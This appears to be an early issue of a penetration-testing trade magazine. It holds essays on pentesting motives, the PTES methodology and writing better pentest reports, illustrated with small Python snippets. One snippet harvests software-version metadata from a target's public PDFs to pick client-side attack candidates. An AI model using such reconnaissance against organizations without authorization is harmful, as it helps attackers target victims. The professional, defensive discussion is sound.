
EDITOR'S NOTE

01/2011 (01)

Dear Readers,

TEAM
Editor: Sebastian Buła
sebastian.bula@software.com.pl
Proofreaders: Jonathan Edwards, Michael Munt, Edward Werzyn Jr., David Small
Betatesters: Stefan Castille, Michael Munt, Juan Bidini, John J. Trinckes, Jr., Kyle Kennedy, David Small, Massimo Buso, Davide Quarta, Santosh Kumar Rana
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic
ewa.dudzic@software.com.pl
Art Director: Ireneusz Pogroszewski
ireneusz.pogroszewski@software.com.pl
DTP: Ireneusz Pogroszewski
Production Director: Andrzej Kuca
andrzej.kuca@software.com.pl
Marketing Director: Sebastian Buła
sebastian.bula@software.com.pl
Publisher: Software Press Sp. z o.o. SK
02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.hakin9.org/en
Whilst every effort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concerning the results of content usage.
All trade marks presented in the magazine were used only for
informative purposes.
All rights to trade marks presented in the magazine are
reserved by the companies which own them.
To create graphs and diagrams we used [program logo].
Mathematical formulas created by Design Science MathType.
As one of our authors implied, penetration testing is an industry; an industry with its own rights, established concepts and ideas. Thankfully, its growing popularity should not be measured only by the number of pen testing quacks and con artists taking it over (although the very idea that it already needs fixing can act as a measure of popularity in itself), but also by the feedback the readers of PenTest Magazine's zero issue gave us. We published the teaser with the modest idea that the fast-expanding penetration testing field deserves its own magazine. Now, judging by the comments that we got and the material our authors provided, we are absolutely sure of it.
However, creating a penetration testing magazine proved to be quite tricky. How do we make sure that the reader gets the right impression of the kind of hacking we promote? There were some great authors who submitted splendid articles sharing their hacking (pen testing!) solutions, which we all worked hard to improve in terms of terminology and message, or, in some extreme cases, could not accept at all. The trick mentioned before is that the idea behind PenTest Magazine was to stay clear of any questionable aspects of hacking: it is not our intention to teach how to hack for any reasons other than genuine, professional penetration testing. I believe, thanks to our great beta testers and proofreaders, that we are at least heading in the right direction.
Thus, the first issue of PenTest Magazine focuses on standards and, hopefully, will provoke more discussion about the basic and ideological concepts of pen testing. It features Fixing the Industry, which you might already know from the zero issue, improved by some commentary from the readers. David Small will tackle a seemingly trivial question: what drives, or at least should drive, pen testers to be pen testers? It really should not be viewed as preaching about ideals. Finally, Bill Mathews will help you write a good penetration test report, which is an indispensable part of every pen test if you want to be regarded as a professional in the field.

Enjoy your reading, and don't forget to submit your comments on the subjects brought up.

Sebastian Buła
& Penetration Test Magazine Team

DISCLAIMER!

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.


CONTENTS

POINT OF VIEW

04 Why We Do It
by David Small

STANDARDS

06 Fixing the Industry
by Iftach Ian Amit and Chris Nickerson
Penetration testing has been a skill (some say an art) for as long as we can remember information security and the computer industry. Nevertheless, over the past decade or so, the term has been completely ambiguated. It has been cannibalized, commercialized, and transformed into a market where charlatans and professionals are on the same playing field.

12 Building a Better Penetration Test Report
by Bill Mathews
Recently I've had the, ahem, pleasure of reading and reviewing a number of penetration test reports from various internal and third-party resources. For fear of getting someone into a good deal of trouble, my source shall remain nameless. My first thought was: wow, this is a wild and varied industry we are in. My second thought was: how is this stuff useful to someone trying to fix the issues found? In the majority of the reports it wasn't obvious what the problem even was, let alone what one would do to fix it. This is a pretty well known problem in the infosec industry as a whole; we tend to overtalk the problem.

BLACK BOX

18 How Fuzzy Are You Today? A Guide to Client-Side Fuzzing Using Peach
by Adrian Furtuna
What do you do if your targets are fully patched and you do not find any configuration issues during a penetration test? Do you take the blue pill and tell the client he's safe (and everybody's happy), or do you take the red pill and go deep into the rabbit hole to find those hidden bugs? Let's take the red pill and see what happens...

NETWORK SECURITY

24 Dueling Apache Tomcat
by Jovon Itwaru
Setting up a JSP-enabled web server is cumbersome and complex. Apache Tomcat aims to solve this dilemma by providing a quick, easy, and cost-effective solution for developers to deploy their applications and services. While this is great for functionality, its default configuration can greatly decrease the security of a network. In this article, we will explore these vulnerabilities and how penetration testers can use them to their advantage.

WEB APPLICATION SECURITY

28 Heuristic Methods vs Automated Scanners
by Hans-Michael Varbaek
As most penetration testers know, a manual check of a web application can be much more thorough than a completely automated one. Combining a few assistant tools, like a transparent proxy, and perhaps a scanner that may find overlooked parts, is a good way to conduct e.g. an assessment of actual vulnerabilities. The manual methodology, however, differs a lot from one ethical hacker to another, and in many cases only very basic (common) approaches are used.

HOW-TO

34 Operationalizing Penetration Testing Results Using Network Monitoring Software, All For Free
by Bill Mathews
Penetration testing these days is often done on a one-off basis, meaning companies do them once a month, once a quarter or once a year and then never think about them again. I find that to be a shame and think that penetration testing can be an invaluable tool in vulnerability management when performed properly.

TOOLS

36 Pulling Shellcode From Network Stream
by Salahudin Wan Khairuzzaman
The Metasploit framework provides ready-to-run shellcode modules that can be compiled easily. Earlier days of exploitation with shellcode required lots of coding and programming effort. Metasploit has simplified this in their framework. In this article, we will use several security tools to pull the shellcode from a network stream and analyze the output.

INTERVIEW

40 Interview with Gary McGraw
by PenTest Magazine Team
Gary McGraw from Cigital about his views on software security and the Building Security In Maturity Model.

POINT OF VIEW

Pen Testing:
Why We Do It
We're penetration testers. What do we do? Why do we do it? What does it say about us?

There are some misconceptions about pen testers. From a shallow look, they appear to be people who break into computer systems, with tools designed to do just that. But this isn't the case; allow me to explain.
The Internet is full of people who try to break into computers connected to it. This happens all the time. A computer's defenses are generally up to one or two people; that's us.
We do tedious things. We keep track of the OS and current software, and patch everything as soon as patches are issued. We read system logs. We check permissions. We leave honey-traps. We look for things that smell wrong. It takes discipline on our end to do all of these things. Because we do this, it's not easy, and it's not quick, to crack into the machines we're trying to protect.
And one of the things we do is to test our security. It's no different than you giving your doorknob a shake after you've locked it, to make sure it won't turn, and that the bolt is engaged and won't open with a simple push. For most people that's a habit they don't even think about. That's penetration testing.
Now an attacker has some sort of motive to try to get into our systems. However, it's usually something simple, like rooting another machine. There are so incredibly many computer systems which are simple to get into that we hope that attackers will become bored and invest their energies someplace else. (This is the low-hanging-fruit principle.)
But we also hope the attackers will get bored with doing something that's no challenge, and start doing something harder, namely, working on securing computers. That's a very hard challenge.
As I said, most attackers will test out a few really obvious ways into your computer, and if they don't work, they'll move on to the next machine. It may tell you something that they're called script kiddies.
Would you like to do something far harder? Would you like to earn the respect of the small community of security people? There's room for researchers, consultants, even writers for magazines. (And certainly the pay isn't bad, either.)
There are few things like knowing you're one of the best.
U.S. President John F. Kennedy said it very well back in 1962, when he started Project Apollo, to land on the moon by 1970: "We choose to go to the moon. We choose to go to the moon in this decade and do the other things, not because they are easy, but because they are hard, because that goal will serve to organize and measure the best of our energies and skills..."

DAVID SMALL


STANDARDS

Fixing the Industry


Penetration testing has been a skill (some say an art) for as long
as we can remember information security and the computer
industry. Nevertheless, over the past decade or so, the term
has been completely ambiguated. It has been cannibalized,
commercialized, and transformed into a market where charlatans
and professionals are on the same playing field.

The commercial industry has embraced the sexiness of penetration tests, built products around it, uprooted its values with product marketing and sales speak, and conned organizations into buying deeper and deeper into the dreaded pentest unit (as in: "I need 2 units of pentest to complete this compliance effort"). Backed by a thriving regulatory compliance rush to check off as many items as possible on audit lists, pentesting was dealt the final blow to its heritage of value. A once surgical skill that required innovation, critical thinking, technical savvy, business understanding, and good old hacker-sense was reduced to a check box on the back of a consulting company's marketing material.
This type of market commoditization has led to the frustration of many businesses and consultants alike.

Commercializing security tools and compliance are giving the industry a double blow

With this in mind, a group of security veterans (each with at least a decade under their belt, and numerous successful penetration tests in various industries) got together to discuss the state of the industry, and a common gripe was echoed. Many of the venting sessions from professionals around the world centered on the wide array of testing quality within penetration tests. This huge gap was often boiled down to the "Scanner/Tool Tests" versus "Real Testing" arguments. Another common theme of these sessions was the decided lack of value presented by the Scanner type of testing, and some brainstorming on how that could be resolved worldwide. This issue was not localized or specific to any vertical; it was something that InfoSec professionals from all around the globe were experiencing. From these sessions, happening at EVERY security conference thrown, an idea was born: the idea to finally standardize and define what a penetration test really is. This would help testers increase the quality and repeatability of the testing, while also giving the organizations undergoing the testing a reference list of what is to be done during the test. This is where the Penetration Testing Execution Standard (PTES) started. After a couple of months of working behind the scenes, a group of about a dozen security practitioners from different parts of the industry put forth a basic mind map of how they did penetration tests. Later on, that blended map was released to a larger group of InfoSec professionals. This group tore apart the original map and streamlined it to fit a larger and wider audience. At that point a final rendition of the mindmap was constructed by 25+ international InfoSec professionals. With over 1800 revisions to the alpha mindmap, the team then opened up the stage for more massive collaboration and started building one of the more exciting concepts in the security industry. Currently the Penetration Testing Execution Standard is backed by dozens of volunteers from all around the world, working in teams on writing the finer details of what will be the golden standard for penetration testing, for organizations as small as a 15-person company and as large as a government agency or a nation's critical infrastructure.
The standard spans seven sections that define the content of a penetration test. These sections cover everything from how to formalize the engagement legally and commercially, up to what areas the final report should cover. Following is an overview of the sections and what they reflect in terms of how a penetration test should be conducted.

Pre-Engagement Interaction
In this section the standard defines some basic rules of engagement, scoping, points of contact, and, most importantly, goals for the engagement. This is often neglected and overlooked (as in our previous example of two pentest units, which are usually followed by just a website or an IP address to be tested), and it is one of the main reasons for organizations not getting any value out of such testing. The section goes on to define the resources that the tester is allowed to utilize in the business, and the tester is given an opportunity to gain a better understanding of the business aspect that is being scrutinized and of the real goals of the test (which are NEVER a server, an application, or even a network). In addition to the goal/value oriented approach of the tester, the organization receiving the test (the customer) will also be able to reference this section. The customer will be able to set guidelines for the test, understand the safeguards put in place, and have a full understanding of the communication pathways that will be open throughout the test. Oftentimes, customers do not have the appropriate channel of communication with the testing group, and this causes confusion in the testing process. We aim to make the goals and tests performed clear to both sides well before the testing begins.

Information and Intelligence Gathering

In this section the standard really kicks in. This is where we received the most comments, along the lines of "this is too expensive", "we don't know how to do this", and "this is not really necessary". From our collective experience (at least the founding team's) we can clearly state that when this phase is done right, we can already know the outcome of the pentest. During the intelligence-gathering phase, the tester aims to build as comprehensive a picture of the target organization as possible: everything from corporate information, the vertical in which the organization operates, business processes that are crucial to the business, and financial information, all the way up to mapping out specific personnel, their online social presence, and how to use all of that information in the way an attacker would. On the other hand, the organization being tested will finally get a clear overview of how it is perceived by an investigative attacker. A lot of information is being spilled out through unauthorized (and seemingly legitimate) channels, social media, and just plain old bad policies. It is crucial for the tested organization to see exactly what information is available out there in order to either prepare for such information being used against them or fix any policy/training gaps it may have in relation to information disclosure. Until this exercise is performed, most companies do not understand the gravity of the information that can be collected about them. For example: if a tester can identify that the customer is using an unpatched version of Acrobat (found through the analysis of metadata within a published document), the customer is a prime candidate for a client-side/malicious file attachment attack. Also, if there are sensitive documents published in corporate directed locations, it may pose an even bigger risk (i.e. VPN login instructions on a public webserver; yes, we ran into these many times in the past).
The information and intelligence gathering phase aims to gather as much information as possible about the target and fully explore the increased threat surface to attack. The standard covers digital collection through open source intelligence resources as well as paid-for resources, physical on-site collection and observation, and human intelligence collection. After all, the more a tester has to attack, the more comprehensive the results will be. This is the most aggressive approach available, but it will not be required for all strengths of tests. It's important to note that the standard will also define levels or strengths of operations within each section, which would allow small engagements to employ the more standard OSINT (Open Source Intelligence) methods, and larger scale or higher level/strength engagements to include the more elaborate on-site, physical and HUMINT (Human Intelligence) elements.
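As a toy illustration of the metadata point above (this is not part of the standard itself), the following Python sketch pulls authoring-software strings out of PDF documents harvested from a target's public website. It assumes the PyPDF2 library is available; the file names are hypothetical.

from PyPDF2 import PdfReader

def fingerprint_pdf(path):
    # Return the authoring software recorded in a PDF's metadata.
    meta = PdfReader(path).metadata
    return {
        "file": path,
        "creator": meta.creator if meta else None,    # authoring application
        "producer": meta.producer if meta else None,  # converter, often carries a version
        "author": meta.author if meta else None,      # may leak an employee username
    }

for doc in ["whitepaper.pdf", "annual_report.pdf"]:  # hypothetical downloads
    print(fingerprint_pdf(doc))

A producer string such as "Acrobat Distiller 8.1.0" hints at the client-side software, and patch level, in use inside the organization, which feeds directly into the threat modeling and exploitation phases.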

Threat Modeling

The threat-modeling section provides the tester and the


organization with clear documentation of the relevant
threat communities as well as the assets and their values.
The threat modeling is performed around two central lines: the attacker and the business assets. From an
attacker perspective, all the relevant threat communities
are identified, researched, documented, and their
capabilities are fully analyzed and documented.
From a business asset perspective, all the critical business
assets (physical, logical, process, 3rd party, intellectual,
etc.) are identified. During the documentation phase of
these assets, every relevant supporting technology system
is mapped, along with the relevant personnel, interaction,
processing, and the information lifecycle.
The main output from this phase is a well-documented
threat model that takes into account the data gathered


and analyzed at the intelligence gathering phase, and can be used to create attack trees and map out venues for vulnerability analysis of key processes and technologies. This is another key component to providing value in penetration testing. If the customer does not know what the threat to the business or the actual risk is, why should they resolve the issue? Threat modeling provides a weighting system so that testers can rely less on a screenshot of a shell and more on the overall value to the business.
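To make the idea of a weighting system concrete, here is a deliberately simple sketch; PTES does not prescribe this formula, and every name and number below is invented for the example. It weights a raw technical severity by the value of the affected asset and the capability of the relevant threat community.

ASSET_VALUE = {"general_ledger": 9, "public_brochure_site": 2}
THREAT_CAPABILITY = {"organized_crime": 8, "script_kiddie": 3}

def business_risk(asset, threat, technical_severity):
    # Weight a 1-10 technical severity by asset value and threat capability.
    return technical_severity * ASSET_VALUE[asset] * THREAT_CAPABILITY[threat]

print(business_risk("general_ledger", "organized_crime", 7))      # 504
print(business_risk("public_brochure_site", "script_kiddie", 7))  # 42

The same technical finding scores very differently depending on what it exposes and to whom, which is exactly the argument for relying less on the screenshot of a shell.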

Vulnerability Analysis

Only at this stage do we run into what more traditional penetration tests actually include in their scope. As we can clearly see, the new penetration testing execution standard provides a much more thorough background for the test, from a business understanding as well as from a technical perspective. Leveraging this extensive research, the vulnerability analysis phase (which can sometimes be considered as technology-centric threat modeling) defines the extensive coverage of mapping out and documenting any vulnerability in processes, physical infrastructure, and of course technology related elements. This phase does include some interaction with the organization, as the testers probe for services and equipment, confirm assumptions made at the threat modeling and intelligence gathering phases, and fingerprint the underlying software being deployed.
One of the deliverables from this phase (on top of the actual vulnerability mapping and assertion) is a set of attack trees that correspond to the entire process thus far. This by itself can provide a lot of value to the organization, as a living document that can be updated with relevant threats, vulnerabilities and exposures, and that is used as one of the parameters for the ongoing risk management practice.
Mind you, this is not just running a scan or port mapping. This is a comprehensive process to analyze the data collected for attack routes as well as to identify venues for attacks. The tester will leverage conventional and unconventional ways to identify vulnerabilities: missing patches, open services, misconfigurations, default passwords, intellectual property leakage, increased threat through leaked information (passwords/docs), and much more. This hybrid approach allows the testers to collect actionable information and rank the ease of attacks. Once the tester has analyzed the potential vulnerabilities present, they will have a clear picture of what/why/how/where and when to execute attacks to confirm the validity of each vulnerability.
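To illustrate what an attack tree can look like as a working artifact (the node names below are invented, and this structure is only a sketch, not a PTES deliverable format), a nested mapping is enough to enumerate candidate attack routes:

ATTACK_TREE = {
    "goal: access the general ledger": {
        "compromise ERP application server": {
            "exploit unpatched service found during fingerprinting": {},
            "reuse credentials leaked through OSINT": {},
        },
        "compromise finance workstation": {
            "malicious PDF targeting unpatched Acrobat": {},
        },
    }
}

def attack_paths(tree, path=()):
    # Enumerate every root-to-leaf path, i.e. every candidate attack route.
    for node, children in tree.items():
        if children:
            yield from attack_paths(children, path + (node,))
        else:
            yield path + (node,)

for route in attack_paths(ATTACK_TREE):
    print(" -> ".join(route))

Kept under version control, such a tree becomes the living document described above: new intelligence adds branches, remediation prunes them.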

Exploitation

The exploitation section is very close to the common scope of penetration tests these days. It includes the actual attack execution against the organization. With all the proper intelligence, threat modeling and vulnerability analysis in place, this phase becomes much more focused and, more importantly, much more fine-tuned to the organization being tested. In a proper penetration test, we should not just see spread-spectrum scans and exploitation attempts on every conceivable technology from a tool or two, but also (and again much more importantly) a dedicated attack path that leads from the true assets that the organization holds to the specific vulnerabilities (either technology related or human/process related). This type of validation is a process that is often lost in the "throw all the attacks we have at it" type of automation. Here, the standard aims to act on the vulnerabilities identified and confirm or refute their existence. Many testers and testing tools, due to lack of actionable intelligence or poor planning, will run exploits against hosts that do not have the exploitable package running or even installed. This causes undue increased traffic and potential risk to the business environment.

Post-Exploitation

At this point most pentests conclude the engagement and provide a report that includes every finding with some sort of traffic light rating (low, medium, high...) that is pre-baked into the reporting tool. However, real-world attackers would not be satisfied with merely getting a foothold inside the organization; they would try to leverage it further, either to obtain additional information/resources, or to actually find a way to exfiltrate the information/control outside of the organization. The exfiltration of and access to the data types or control systems will fit directly into the threat modeling conducted earlier in the process. The tester will be able to show the real company impact of certain attacks and why they are relevant to the company (i.e. there is a big difference between showing an executive a screenshot of a shell and showing them the interface THEY use to change the General Ledger within the ERP system. This type of focus provides an instant impact and is formatted in the language that makes sense to the business).
The post-exploitation phase defines the scope of such additional tasks, which provide the organization with a way to see how it would really stand up to such an attack, and whether it would be able to identify related data breaches and leaks. Conducting this focused attack on resources paints a very clear and concise picture of the threat's capability and its possible effects on the business as a whole.

Reporting

Finally, this trip through an attacker's modus operandi needs to be concluded with a clear and useful report, in order for the organization to actually see value from such an engagement. The value is not limited to documenting the technical gaps that need to be addressed; the report also needs to provide a more executive-level view that reflects the organization's exposure to loss in business (financial) terms. This would include the actual meaning of which assets are at the highest risk, how many resources are used to protect different assets, and a recommendation on how to more efficiently close any gaps in exposure by spending resources on controls and protections more intelligently.
Such a recommendation would not have been possible without the surrounding activities that provide the business relevance of the exercise and the tested business elements. This is also where the organization will end up finding the most value in the engagement, as opposed to most common pentests, which leave it with a laundry list of exploits and vulnerabilities without their actual relevance or business impact. In the report, the tester will be required to identify the symptomatic vulnerabilities (like a missing patch) as well as tie out the systemic vulnerabilities (a patch is missing BECAUSE there are gaps in policy and procedure in x/y/z area which allowed the patch not to be installed in a timely manner or within the specified time).

Measuring detection and incident response is an integrated part of a penetration test

It's important to note that although there isn't a dedicated section for detection and incident response, the organization's capabilities to identify and react to anything from the intelligence gathering, through the vulnerability analysis, to the exploitation and post-exploitation are also put to the test. The penetration test includes direct references to such capabilities in each section (as well as in the reporting section), and can be extremely useful to clearly identify the organization's maturity in terms of risk management and handling. This provides an additional value to the customer, as they are allowed to test the effectiveness of their defensive monitoring systems and/or outsourced solutions.
At the end of the day, the forces of the industry will dictate what a penetration test will look like and what it will contain. Nevertheless, the PTES aims to provide the industry with a baseline it clearly lacks now. The term has been mutated over many iterations, and it has been given a very narrow freedom to operate between the minimum that has been dictated by regulatory requirements (which did good and actually forced more businesses to test themselves), and the glass ceiling that has been created de facto by the hordes of pentesters who know nothing better than using some product to push out a report to the customer and move on to the next. By clearly defining the term (which is used in a multitude of standards without an adequate definition of what it means or consists of) and what the purpose, value and components of a penetration test are, PTES will increase the confidence of customers and testers alike. For quite some time now, organizations have expected the value of conducting a penetration test to be not much more than a rubber stamp on the audit report or a ticked checkbox on their compliance worksheet. PTES is attempting to increase that value and blow some wind into the dwindling sails of what once was a critical part of running a secure operation. In these modern days, when everyone is so easily hacked by an APT, isn't it time our testers started acting like one? Or would you rather have an Automated Penetration Test (APT) that you pay for and that does not even attempt to learn WHY the test is being done in the first place?

IFTACH IAN AMIT
Iftach Ian Amit brings over a decade of experience in the security industry, and a mixture of software development, OS, network and web security expertise, as Vice President of Consulting at the top-tier security consulting firm Security-Art. Prior to Security-Art, Ian was the Director of Security Research at Aladdin and Finjan. Ian has also held leadership roles as founder and CTO of a security startup in the IDS/IPS arena, and as a director at Datavantage. Prior to Datavantage, he managed the Internet Applications and UNIX departments at the security consulting firm Comsec. Ian is a frequent speaker at leading industry conferences such as BlackHat, DefCon, Infosec, Hacker Halted, FIRST, BruCon, SOURCE, ph-neutral, and many more.

CHRIS NICKERSON
Chris Nickerson, CEO of LARES, is just another security guy with a whole bunch of certs, whose main area of expertise is focused on real world attack modeling, Red Team testing and InfoSec testing. At Lares, Chris leads a team of security professionals who conduct risk assessments, penetration testing, application testing, social engineering, Red Team testing and full adversarial attack modeling. Prior to starting Lares, Chris was Director of Security Services at Alternative Technology, worked in Sr. IT compliance at KPMG, and was Sr. Security Architect and Compliance Manager at Sprint Corporate Security. Chris is a member of many security groups and was also a featured member of TruTV's Tiger Team. Chris is the cohost of the Exotic Liability podcast, the author of the upcoming RED TEAM TESTING book published by Elsevier/Syngress, and a founding member of the BSIDES conference.


Comment
The Penetration Testing Execution Standard (PTES) provides a great start for information security professionals who are new to penetration testing and vulnerability analysis. As a novice, one always wonders what a good starting point is, and PTES definitely provides an excellent view of the landscape.
Another salient feature of PTES is that it is developed by a group of professionals rather than one single organization or institution. It must have been a challenge to blend in the various mindmaps and come up with a monolithic structure. It would be interesting to see if PTES goes down The Open Web Application Security Project (OWASP) route, where the documentation is augmented with videos, tutorials and tools and receives tremendous professional support and participation.

ABY RAO
CISSP, Security+, ITIL, Project+, ISO/IEC 20000
Principal, Verve Security (http://www.vervesecurity.com)

Comment

I think this is a great project and far overdue for our profession, in my opinion. Security companies and consultants in the field have blurred the line between true penetration testing and vulnerability testing. Running an automatic scanner might be a starting point to identify potential vulnerabilities, but it is NOT to be considered an all-inclusive penetration test. I do not feel that we will ever be able to rely on completely automated testing solutions, as they will always lack the tester's experience, be prone to false positives, and be unable to adapt to varying environments that require non-standard approaches.

JEFF WEAVER
Sr. Network Security Engineer

Upcoming events
TakeDownCon is a brand new information security conference series, created by EC-Council. This highly technical information security conference series is very focused: the theme of this first of the series is Taking Down Security, focusing on attack and defense vectors. World class experts including Barnaby Jack, Kanen Flowers, Joe McCray, Rodrigo Branco and Sean Arries, among others, will demonstrate and showcase how security systems can be taken down with ease. This two-day conference, in a very casual and relaxed setting, is targeted towards information security researchers, engineers and technical professionals. http://www.takedowncon.com

The III Security Forum will take place in the Technical School in Carlos Casares, Buenos Aires, Argentina. Security experts will talk on the following: 2600 & BuenosAiresLibre.org; checking your company's security; privacy in social networks (Impossible mission?); wireless hacking; secure solutions with *BSD. http://www.eetcasares.org/


Secure Ninja Expert Training & Certification
Preferred Pricing for Pen Test Magazine Subscribers
Pen Test Magazine has secured an agreement with Secure Ninja to offer subscribers special discounts on their expert training classes. Watch our newsletter for special promo codes granting the discount. To review the list of available courses, please visit http://secureninja.com/. Subscribe and expect more special offers in the future!

If you have any comments on a subject brought up in an article you have read in a teaser, don't hesitate to submit your thoughts. Send your comments to sebastian.bula@software.com.pl (as the subject of your mail: the title of the article + commentary). Make it short (a few sentences), but informational. Add your name and the company you're representing, or your job title. The most interesting comments will be published in the magazine alongside the full articles.

Say Hello to Red Team Testing!
Security Art's Red Team service operates on all fronts on behalf of the organization, evaluating all information security layers for possible vulnerabilities. Only Red Team testing provides you with live feedback on the true level of your organizational security.
Thinking creatively! That's our approach to your test.
Security Art's Red-Team methodology consists of:
1. Information and intelligence gathering
2. Threat modeling
3. Vulnerability assessment
4. Exploitation
5. Risk analysis and quantification of threats to monetary values
6. Reporting

Ready to see actual benefits from your next security review?
info@security-art.com
Or call US toll free: 1 800 300 3909
UK toll free: 0 808 101 2722
www.security-art.com

STANDARDS

Building a Better
Penetration Test Report
Do you build reports for your penetration tests? Want to make
them more useful and more readable? This article is for you.
Various tips are spelled out that have proven effective for the
author over the years.

Recently I've had the, ahem, pleasure of reading and reviewing a number of penetration test reports from various internal and third-party resources. For fear of getting someone into a good deal of trouble, my source shall remain nameless. My first thought was: wow, this is a wild and varied industry we are in. My second thought was: how is this stuff useful to someone trying to fix the issues found? In the majority of the reports it wasn't obvious what the problem even was, let alone what one would do to fix it. This is a pretty well known problem in the infosec industry as a whole: we tend to overtalk the problem. That is, and I know a number of folks who do this regularly, we simply cannot distill a problem or issue down into an actionable item. At least not in writing. We like to explain exactly how clever we are and exactly how we found an issue, but how to fix it is usually the last thing on our minds. This of course isn't true in all cases, but out of the reports I got to look over it was the case in most instances. I am going to attempt to outline how to build a better penetration test report, and I'm going to use a category-then-list format for easy digestion. If you don't like lists because they are overused, please withhold your anger; they are overused for a reason: people like them.

Executive Summaries

This is often a VERY overlooked part of any report. Folks think you just include some charts and graphs and off you go. Nothing could be further from the case. Remember, whether you're a third-party tester or an internal tester, the executives pay your bills; be nice to them! The reports I reviewed basically had an executive summary that said either "your stuff is broken beyond repair" or "you need to pay us to come fix it for you". Neither is a good message to send to non-technical executives. Below are some tips for driving the point home without being insulting and without over- or understating the problems.

• Charts and graphs can be useful and powerful tools as long as they're properly used. The ones I like to see break down the issues by severity, and then by severity and by category. This will tell the executive exactly where the discovered issues are and how bad they are. This provides a snapshot they can use to allocate resources appropriately. See: useful and powerful! (A minimal sketch of these two breakdowns follows this list.)
• Provide a set of scenarios for each issue or category of issues, ranging from best case to worst case as it relates to the business you're (or your client is) in. This allows them a better understanding of what the vulnerability could lead to. Save the drama and stick to something that might have a reasonable shot of happening. Someone is probably not going to leverage an XSS vulnerability on a toy maker's website to set off a nuclear explosion that brings about the zombie apocalypse. I mean, it COULD happen, but maybe save that one for your fiction writing class. The more realistic the better here.
• Provide a non-technical explanation of the vulnerability. I know this one is tough, but stay with me. Executives, for the most part, aren't technical people, and that's no reason to be insulting to them. They have different skills, like balancing checkbooks and managing people, so, in English (or the language of your land), explain the problem, clearly. Some German physicist once said: "You do not really understand something unless you can explain it to your grandmother." He was a pretty smart guy; we should carry that quote with us when building our executive summaries, and in reports in general.
• Try to include some criticality rankings as they relate to the industry. For instance, if the industry best practice is to rate an XSS hole as a high criticality, say that, then explain why you may have marked it as medium if that is the case. There are mitigating circumstances in a lot of cases that may cause you to do this. It is okay to not mark everything as high, especially when the vulnerability doesn't warrant it. Another example from my report reviews: every case of being able to find version information about a service was marked as a high criticality issue. It made me very sad.

Ultimately your executive summary should tell what is wrong, in what places, and how bad. The keep it simple principle applies here as it does to most things.
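As a minimal sketch of the two breakdowns suggested in the first tip (the findings list is invented sample data), a tally by severity and by severity-and-category is all the chart needs:

from collections import Counter

findings = [
    {"severity": "high", "category": "web"},
    {"severity": "high", "category": "network"},
    {"severity": "medium", "category": "web"},
    {"severity": "low", "category": "config"},
]

by_severity = Counter(f["severity"] for f in findings)
by_severity_and_category = Counter((f["severity"], f["category"]) for f in findings)

print(by_severity)               # Counter({'high': 2, 'medium': 1, 'low': 1})
print(by_severity_and_category)  # e.g. ('high', 'web'): 1, ...

Feed the counts to whatever charting tool you prefer; the point is that the executive sees where the issues are, and how bad they are, at a glance.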


Vulnerability Reporting

This section of a report is often where the rubber meets the road, so to speak. This is where you get to report your findings in all their deep, technical glory. But wait! You might want to consider your audience first. Typically you're not presenting your results to security people. Typically they're being presented to a more-technical-than-our-hypothetical-manager-above manager. That manager will then break apart your report for distribution to the appropriate parties. Web developers, database administrators, network administrators, etc. will be getting their own chunked up version of your report. This requires some forethought on your part for how you design your vulnerability reporting. Here's a list of steps I think are useful for vulnerability reporting; you should consider including these along with any specific requirements your client or company might have.

• Assign a unique vulnerability ID; well, unique to you, your client or company. This helps with tracking the issue throughout the remediation process. It also helps the tech folks communicate the status of a particular issue up the chain. Something like department code-vulntype-number would work for this. So, 001-web-010 would identify a vulnerability in department code 001, classified as a web attack, with an identifying number. (A small sketch of this scheme follows this list.)
• Remember to try to speak your end audience's language. Even the best web developer may not be aware of CSRF by that name, so make sure you take the time to explain the issue. If she were to try to explain advanced web usability standards to you, you probably would drift off too. I know we think what we do is the most important thing in the whole galaxy (and it is), but not everyone shares that opinion. This is especially true if they have experienced a rather unenlightened security person before who tried to tell them not only that their code was insecure but that it lacked comments and readability. Yes, that was in one of the reports I had a chance to peruse. Try not to be THAT security person.
• Make each vulnerability stand on its own, remembering that your report is probably going to be distributed in chunks. If one vulnerability depends on or is related to another, you should note that in a "relates to" section. This helps the manager know to distribute that issue with its related issue, whether it belongs to that specific group or not.
• Include an evidence section that is fairly detailed as to what actually happened! Screenshots, videos, packet captures and details: these are all welcome here. This is where you can be more technical to cover what the problem actually is. Again, it is not enough to just insert "Suzie waz h3r3" into a database. Be as descriptive as possible. What page was the problem located at? What fields were vulnerable? What did you do to find the problem? How can it be reproduced? These are essential questions to answer in a vulnerability report.
• Include some industry references. It's awesome to include a CVE or OSVDB reference for some packaged piece of commercial software where you discover an application that hasn't been patched. You should go further. If you find a SQL injection in a custom piece of code, point to some industry standard resources on the issue. This helps educate the folks involved with the applications and will hopefully result in more secure code being written. That is our end goal, right?
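Here is a small sketch of the ID scheme from the first bullet. The department code-vulntype-number format is the suggestion made above; the helper names are mine and purely illustrative.

import re

ID_PATTERN = re.compile(r"^(?P<dept>\d{3})-(?P<vulntype>[a-z]+)-(?P<number>\d{3})$")

def make_vuln_id(dept, vulntype, number):
    # Build an ID such as 001-web-010.
    return f"{dept:03d}-{vulntype}-{number:03d}"

def parse_vuln_id(vuln_id):
    # Split an ID back into its department, type and number parts.
    match = ID_PATTERN.match(vuln_id)
    if not match:
        raise ValueError(f"not a valid vulnerability ID: {vuln_id!r}")
    return match.groupdict()

print(make_vuln_id(1, "web", 10))    # 001-web-010
print(parse_vuln_id("001-web-010"))  # {'dept': '001', 'vulntype': 'web', 'number': '010'}

Because the ID is trivially parseable, a ticketing system can route each finding to the right department automatically.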


Tool Data and Use

Everyone uses scanners; if you claim otherwise, either you are not paying attention or you are not being honest with yourself. You may not rely 100% on the scan data, but you use it. The question is: should you just, by default, provide the scan data with your report? This one causes a pretty heated argument in my head. On one hand, I think you should just include the full tool data with your report: you used a scanner, some web application discovery tool, etc., so you should provide the raw data. On the other hand, I balance this with the fact that the number one complaint I hear about penetration testing reports is "they dropped 60 pounds of paper on my desk and just left it there, what am I supposed to do with that?" Here is what I think should be done with tool data:

• Don't provide the raw data by default. Let the necessary parties know it is available upon request, but generally providing it straight away leads to comments like the one above and a lot of confusion. You are paid to interpret the results, not the end reader of your report. The tools you use should be just that: tools that provide to-be-analyzed data, not output to be used as the end report.
